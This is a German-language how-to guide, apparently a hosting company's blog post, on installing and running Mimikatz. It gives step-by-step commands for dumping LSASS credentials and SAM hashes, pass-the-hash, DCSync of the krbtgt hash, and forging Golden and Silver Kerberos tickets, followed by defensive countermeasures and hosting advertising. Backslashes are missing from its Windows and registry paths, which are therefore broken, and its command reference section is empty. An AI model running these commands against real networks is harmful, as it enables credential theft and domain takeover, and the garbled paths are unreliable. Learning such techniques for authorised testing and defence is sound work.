Wie man Mimikatz installiert und verwendet: Ein vollständiger Leitfaden für Sicherheitsfachleute

Mimikatz ist eines der bekanntesten und am häufigsten diskutierten Tools in der Cybersicherheitswelt. Ursprünglich als Proof-of-Concept entwickelt, um Schwachstellen in der Windows-Authentifizierung zu demonstrieren, ist es zu einem unverzichtbaren Instrument im Werkzeugkasten von Penetrationstestern, Red Teamern und Sicherheitsforschern geworden. Dieser Leitfaden bietet eine umfassende Einführung in das, was Mimikatz ist, wer es verwendet und wie man es verantwortungsvoll in einer kontrollierten Umgebung installiert und betreibt.

> Rechtlicher Hinweis: Mimikatz darf nur auf Systemen verwendet werden, die Sie besitzen oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Die unbefugte Nutzung ist illegal und kann zu schwerwiegenden strafrechtlichen Konsequenzen führen. Dieser Leitfaden dient ausschließlich zu Bildungszwecken und legitimem Sicherheitstesting.

—

Was ist Mimikatz?

Mimikatz ist ein Open-Source-Windows-Sicherheitstool, das vom französischen Sicherheitsforscher Benjamin Delpy entwickelt wurde. Seine Hauptfunktion besteht darin, Authentifizierungsdaten zu extrahieren — darunter Klartextpasswörter, NTLM-Passwort-Hashes, PIN-Codes und Kerberos-Tickets — direkt aus dem Speicher eines Windows-Systems (insbesondere aus dem LSASS-Prozess).

Da Windows historisch gesehen Anmeldedaten im Speicher zwischengespeichert hat, um eine nahtlose Authentifizierung über Dienste hinweg zu unterstützen, konnte Mimikatz eine grundlegende Designschwäche in der Art und Weise aufdecken, wie das Betriebssystem mit sensiblen Authentifizierungsdaten umging. Microsoft hat seitdem Gegenmaßnahmen wie Credential Guard und die Sicherheitsgruppe Protected Users eingeführt, aber Mimikatz entwickelt sich parallel zu diesen Abwehrmaßnahmen weiter, was es zu einem unschätzbaren Referenztool für das Verständnis der aktuellen Bedrohungslandschaft macht.

Hauptfähigkeiten von Mimikatz

• Extraktion von Klartextpasswörtern aus dem Windows-Speicher (LSASS)
• NTLM-Hash-Dumping aus der SAM-Datenbank und Active Directory
• Kerberos-Ticket-Extraktion und -Manipulation (Golden Ticket, Silver Ticket Angriffe)
• Pass-the-Hash (PtH)-Authentifizierung mit erfassten Hashes
• Pass-the-Ticket (PtT)-Angriffe mit gestohlenen Kerberos-Tickets
• DCSync-Angriffe zur Replikation von Domänencontroller-Daten ohne direkten Zugriff

—

Wer verwendet Mimikatz und warum?

Legitime Sicherheitsanwendungsfälle

Mimikatz wird hauptsächlich von Informationssicherheitsexperten in folgenden Kontexten verwendet:

• Penetrationstesting — Simulation realer Angriffe zum Diebstahl von Anmeldedaten, um zu beurteilen, wie gut die Abwehrmaßnahmen einer Organisation einem Angreifer standhalten, der sich bereits Zugang verschafft hat.
• Red Team-Operationen — Nachahmung von Advanced Persistent Threat (APT)-Techniken, um die Erkennungs- und Reaktionsfähigkeiten von Blue Teams und SOC-Analysten zu testen.
• Sicherheitsaudits — Bewertung, ob Passwörter und Kerberos-Tickets gemäß den bewährten Sicherheitspraktiken gespeichert und geschützt werden.
• Schulung und Sensibilisierung — Demonstration für Systemadministratoren und Ingenieure, wie anmeldedatenbasierte Angriffe in der Praxis funktionieren, um abstrakte Bedrohungen greifbar und handlungsorientiert zu machen.
• Schwachstellenforschung — Identifizierung neuer Schwachstellen in Windows-Authentifizierungsmechanismen, bevor böswillige Akteure diese ausnutzen können.

Böswilliger Missbrauch

Leider ist Mimikatz aufgrund seiner Effektivität auch ein bevorzugtes Tool unter Bedrohungsakteuren. Häufige böswillige Anwendungsfälle umfassen:

• Pass-the-Hash-Angriffe — Authentifizierung bei Systemen mit erfassten NTLM-Hashes, ohne das ursprüngliche Klartextpasswort zu kennen.
• Pass-the-Ticket-Angriffe — Verwendung gestohlener Kerberos-Tickets, um legitime Benutzer in einem Netzwerk zu imitieren.
• Post-Exploitation-Persistenz — Sammlung von Anmeldedaten nach einem ersten Einbruch, um sich lateral durch ein Netzwerk zu bewegen und Privilegien zu eskalieren.
• Golden Ticket-Angriffe — Fälschung von Kerberos Ticket Granting Tickets (TGTs), um dauerhaften, nahezu unbegrenzten Zugriff auf Domänenressourcen zu erlangen.

Zu verstehen, wie Angreifer Mimikatz einsetzen, ist genau der Grund, warum Verteidiger damit vertraut sein müssen. Wenn Sie eine VPS Hosting-Umgebung betreiben oder dedizierte Infrastruktur verwalten, hilft Ihnen das Wissen über diese Angriffsvektoren, widerstandsfähigere Abwehrmaßnahmen aufzubauen.

—

Voraussetzungen

Stellen Sie vor dem Fortfahren sicher, dass die folgenden Bedingungen in Ihrer autorisierten Testumgebung erfüllt sind:

> Best Practice: Führen Sie Mimikatz-Tests immer in einer isolierten virtuellen Maschine oder einem dedizierten Laborserver durch. Wenn Sie eine sichere, isolierte Umgebung für Penetrationstesting-Labs benötigen, erwägen Sie die Bereitstellung einer VPS Hosting-Instanz mit einem Windows-Image, um Ihre Tests vollständig von der Produktionsinfrastruktur zu trennen.

—

Schritt 1: Mimikatz herunterladen

1.1 Das offizielle GitHub-Repository besuchen

Mimikatz wird als Open-Source-Projekt gepflegt. Laden Sie es immer von der offiziellen Quelle herunter, um manipulierte oder trojanisierte Versionen zu vermeiden:

Offizielles Repository: https://github.com/gentilkiwi/mimikatz

1.2 Die neueste Version herunterladen

1. Navigieren Sie zum Abschnitt Releases des Repositorys (rechte Seitenleiste oder über den /releases URL-Pfad).
2. Suchen Sie die neueste stabile Version.
3. Laden Sie das vorkompilierte Archiv herunter — typischerweise benannt als mimikatz_trunk.zip.

1.3 Das Archiv entpacken

1. Klicken Sie mit der rechten Maustaste auf die heruntergeladene ZIP-Datei.
2. Wählen Sie Alle extrahieren…
3. Wählen Sie ein Zielverzeichnis, zum Beispiel: C:SecurityToolsMimikatz

Nach der Extraktion finden Sie zwei Unterverzeichnisse:

• x64 — 64-Bit-Binärdateien (auf modernen Systemen verwenden)
• Win32 — 32-Bit-Binärdateien (für ältere Systeme)

Die primäre ausführbare Datei, mit der Sie arbeiten werden, ist mimikatz.exe.

—

Schritt 2: Mimikatz ausführen

2.1 Eine erhöhte Eingabeaufforderung öffnen

Mimikatz benötigt Administratorrechte, um mit geschützten Speicherbereichen zu interagieren. So starten Sie eine erhöhte Shell:

1. Drücken Sie Windows + X
2. Wählen Sie Eingabeaufforderung (Administrator) oder Windows PowerShell (Administrator)
3. Klicken Sie auf Ja bei der UAC-Aufforderung

2.2 Zum Mimikatz-Verzeichnis navigieren

cd C:SecurityToolsMimikatzx64

Überprüfen Sie, ob mimikatz.exe in diesem Verzeichnis vorhanden ist:

dir mimikatz.exe

2.3 Mimikatz starten

mimikatz.exe

Wenn das Tool erfolgreich startet, sehen Sie das Mimikatz-Banner und die interaktive Eingabeaufforderung:

  .#####.   mimikatz 2.2.0 (x64) ...
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'         > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz #

Die mimikatz #-Eingabeaufforderung bestätigt, dass das Tool läuft und bereit ist, Befehle entgegenzunehmen.

2.4 Debug-Berechtigungen aktivieren

Bevor Sie die meisten Befehle zur Extraktion von Anmeldedaten ausführen, erhöhen Sie die eigenen Berechtigungen von Mimikatz innerhalb der Sitzung:

mimikatz # privilege::debug

Erwartete Ausgabe:

Privilege '20' OK

Dies gewährt Mimikatz das SeDebugPrivilege-Recht, das notwendig ist, um den Speicher geschützter Prozesse wie LSASS zu lesen.

—

Schritt 3: Grundlegende Mimikatz-Befehle

3.1 Klartextpasswörter aus dem Speicher extrahieren

Dies ist die bekannteste Fähigkeit von Mimikatz. Es liest Anmeldedaten, die vom WDigest-Authentifizierungsanbieter zwischengespeichert wurden, direkt aus dem LSASS-Speicher:

mimikatz # sekurlsa::logonpasswords

Was zurückgegeben wird:

• Angemeldete Benutzernamen
• Domänennamen
• Klartextpasswörter (wenn WDigest-Caching aktiviert ist)
• NTLM-Hashes
• SHA1-Hashes
• Kerberos-Anmeldedaten

> Hinweis: Ab Windows 8.1 hat Microsoft das WDigest-Klartextcaching standardmäßig deaktiviert. Angreifer (und Tester) können es jedoch über einen Registrierungsschlüssel wieder aktivieren, weshalb dies ein relevanter Testfall bleibt.

3.2 Gespeicherte Passwörter anzeigen (Alternativer Befehl)

mimikatz # sekurlsa::passwords

Dieser Befehl bietet eine vereinfachte Ansicht der im Systemspeicher verfügbaren Anmeldedaten.

3.3 Anmeldedaten aus einer Speicher-Dump-Datei extrahieren

Wenn Sie Mimikatz nicht direkt auf dem Zielsystem ausführen können, können Sie zunächst einen LSASS-Speicher-Dump erfassen und ihn offline analysieren:

Den Dump erstellen mit dem Task-Manager:

1. Task-Manager öffnen → Registerkarte Details
2. Rechtsklick auf lsass.exe → Dumpdatei erstellen

Oder verwenden Sie ProcDump (von Sysinternals):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Den Dump mit Mimikatz analysieren:

mimikatz # sekurlsa::minidump C:PathTolsass.dmp
mimikatz # sekurlsa::logonpasswords

3.4 Kerberos-Tickets auflisten

Um alle Kerberos-Tickets in der aktuellen Anmeldesitzung aufzulisten:

mimikatz # kerberos::list

Um Tickets mit vollständigen Details einschließlich Sitzungsschlüsseln aufzulisten:

mimikatz # kerberos::list /export

Dies exportiert jedes Ticket als .kirbi-Datei, die bei Pass-the-Ticket-Angriffen verwendet werden kann.

3.5 Anmeldedaten in eine Datei exportieren

Um die Ausgabe eines Anmeldedaten-Dumps zur späteren Analyse in eine Textdatei zu speichern:

mimikatz # sekurlsa::logonpasswords > C:SecurityToolscredentials.txt

Die Ausgabe wird in credentials.txt im angegebenen Pfad geschrieben.

—

Schritt 4: Erweiterte Mimikatz-Techniken

4.1 Pass-the-Hash (PtH)-Angriff

Pass-the-Hash ermöglicht die Authentifizierung bei einem Remote-System mit einem erfassten NTLM-Hash, ohne das Klartextpasswort zu benötigen:

mimikatz # sekurlsa::pth /user:Administrator /domain:TARGETDOMAIN /ntlm:<NTLM_HASH> /run:cmd.exe

Dies startet einen neuen cmd.exe-Prozess, der als der angegebene Benutzer mit dem Hash authentifiziert ist.

4.2 Golden Ticket-Angriff

Ein Golden Ticket ist ein gefälschtes Kerberos TGT, das mit dem Passwort-Hash des KRBTGT-Kontos signiert ist und dem Inhaber nahezu unbegrenzten Zugriff auf Domänenressourcen gewährt. Dies erfordert den KRBTGT-Hash, der über DCSync abgerufen werden kann:

Schritt 1 — DCSync zum Extrahieren des KRBTGT-Hashes:

mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

Schritt 2 — Das Golden Ticket erstellen:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /krbtgt:<KRBTGT_HASH> /ticket:golden.kirbi

Schritt 3 — Das Ticket einschleusen:

mimikatz # kerberos::ptt golden.kirbi

4.3 NTLM-Hashes aus der SAM-Datenbank dumpen

Um lokale Konto-Hashes aus der SAM-Datenbank zu extrahieren (erfordert SYSTEM-Berechtigungen):

mimikatz # lsadump::sam

4.4 Geheimnisse aus LSA dumpen

mimikatz # lsadump::secrets

Dies ruft LSA-Geheimnisse ab, die Dienstkonto-Anmeldedaten, zwischengespeicherte Domänenanmeldedaten und andere sensible Daten umfassen können, die von der Local Security Authority gespeichert werden.

4.5 Silver Ticket-Angriff

Ein Silver Ticket zielt auf einen bestimmten Dienst ab und nicht auf die gesamte Domäne. Es erfordert den NTLM-Hash des Zieldienstkontos:

mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:<DOMAIN_SID> /target:<SERVICE_HOST> /service:cifs /rc4:<SERVICE_ACCOUNT_HASH> /ticket:silver.kirbi

—

Schritt 5: Defensive Gegenmaßnahmen

Zu verstehen, wie Mimikatz funktioniert, ist nur die halbe Miete. Die andere Hälfte besteht darin, zu wissen, wie man sich dagegen verteidigt. Wenn Sie Windows-Server verwalten — ob auf Dedicated Servers oder cloudbasierter Infrastruktur — sind die folgenden Gegenmaßnahmen entscheidend:

5.1 Credential Guard aktivieren

Windows Credential Guard verwendet virtualisierungsbasierte Sicherheit (VBS), um LSASS in einem geschützten Container zu isolieren und so zu verhindern, dass Mimikatz Anmeldedaten direkt aus dem Speicher liest.

Über Gruppenrichtlinie aktivieren:

Computer Configuration → Administrative Templates → System → Device Guard → Turn On Virtualization Based Security

5.2 WDigest-Authentifizierung deaktivieren

Verhindern Sie das Caching von Klartextpasswörtern, indem Sie WDigest deaktivieren:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest
UseLogonCredential = 0

5.3 Benutzer zur Gruppe Protected Users hinzufügen

Mitglieder der Sicherheitsgruppe Protected Users können sich nicht mit NTLM, DES oder RC4 Kerberos-Verschlüsselung authentifizieren, was die Effektivität von Anmeldedaten-Diebstahl-Angriffen erheblich einschränkt.

5.4 LSA-Schutz implementieren (RunAsPPL)

Aktivieren Sie Protected Process Light (PPL) für LSASS, um unbefugten Speicherzugriff zu verhindern:

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
RunAsPPL = 1

5.5 Auf Mimikatz-Indikatoren überwachen

Konfigurieren Sie Ihre SIEM- oder EDR-Lösung, um Alarme auszulösen bei:

• Zugriff auf lsass.exe-Speicher von unerwarteten Prozessen
• SeDebugPrivilege, das nicht-Systemprozessen gewährt wird
• Verdächtigen sekurlsa-, kerberos– oder lsadump-Befehlsmustern in Prozessprotokollen
• Ungewöhnlichen LSASS-Dump-Dateierstellungsereignissen (Event ID 4656, 4663)

5.6 Systeme aktuell halten

Viele Mimikatz-Techniken nutzen bekannte Schwachstellen oder veraltete Verhaltensweisen aus. Durch das vollständige Patchen von Windows und Active Directory werden ganze Klassen von Angriffsvektoren eliminiert.

—

Mimikatz im Kontext sicherer Hosting-Infrastruktur

Für Organisationen, die Webanwendungen, APIs oder interne Dienste betreiben, erstreckt sich das Risiko des Anmeldedaten-Diebstahls über den lokalen Arbeitsplatz hinaus. Wenn ein Angreifer Zugang zu Ihrer Serverumgebung erhält, können Tools wie Mimikatz verwendet werden, um Privilegien zu eskalieren und sich lateral zu bewegen.

Die Wahl eines Hosting-Anbieters, der Sicherheit auf Infrastrukturebene priorisiert, ist eine wichtige Verteidigungsebene. Ob Sie Shared Web Hosting für kleinere Projekte oder Dedicated Servers für Unternehmensworkloads benötigen — die Sicherstellung, dass Ihre Hosting-Umgebung DDoS-Schutz, Netzwerkisolierung und regelmäßige Sicherheitsupdates umfasst, reduziert Ihre gesamte Angriffsfläche.

Für Teams, die Active Directory-Umgebungen oder Windows-basierte Anwendungen verwalten, stellt die Kombination Ihrer Infrastruktur mit ordnungsgemäß konfigurierten SSL Certificates sicher, dass zwischen Clients und Servern übertragene Anmeldedaten während der Übertragung verschlüsselt sind — eine weitere Schutzebene gegen Abfangen.

—

Zusammenfassung: Mimikatz-Befehlsreferenz

—

Fazit

Mimikatz bleibt eines der leistungsstärksten und lehrreichsten Tools, das Cybersicherheitsexperten zur Verfügung steht. Seine Fähigkeit, grundlegende Schwachstellen in Windows-Authentifizierungsmechanismen aufzudecken, hat zu erheblichen Verbesserungen in der Art und Weise geführt, wie Microsoft den Anmeldedatenschutz gestaltet — von Credential Guard über Protected Users bis hin zu LSA PPL. Für Penetrationstester, Red Teamer und Sicherheitsforscher ist ein gründliches Verständnis von Mimikatz keine Option; es ist unerlässlich.

Die wichtigsten Grundsätze, die immer zu beachten sind:

• Holen Sie immer eine ausdrückliche schriftliche Genehmigung ein, bevor Sie Mimikatz auf einem System verwenden.
• Verwenden Sie isolierte Umgebungen — virtuelle Maschinen oder dedizierte Laborserver — um versehentliche Exposition zu vermeiden.
• Verstehen Sie die Abwehrmaßnahmen genauso gründlich wie die Angriffe.
• Bleiben Sie aktuell — sowohl Mimikatz als auch Windows-Abwehrmaßnahmen entwickeln sich kontinuierlich weiter.

Durch die Kombination von praktischem Wissen über Tools wie Mimikatz mit einer sicheren, gut konfigurierten Hosting-Infrastruktur können Sicherheitsteams Abwehrmaßnahmen aufbauen, die tatsächlich gegen reale Angriffstechniken getestet wurden, anstatt auf theoretischen Annahmen zu basieren.

—

*AlexHost bietet sichere, hochleistungsfähige Hosting-Lösungen, die speziell für sicherheitsbewusste Profis entwickelt wurden. Entdecken Sie unsere VPS Hosting-Pläne und Dedicated Servers, um Ihr nächstes sicheres Labor oder Ihre Produktionsumgebung aufzubauen.*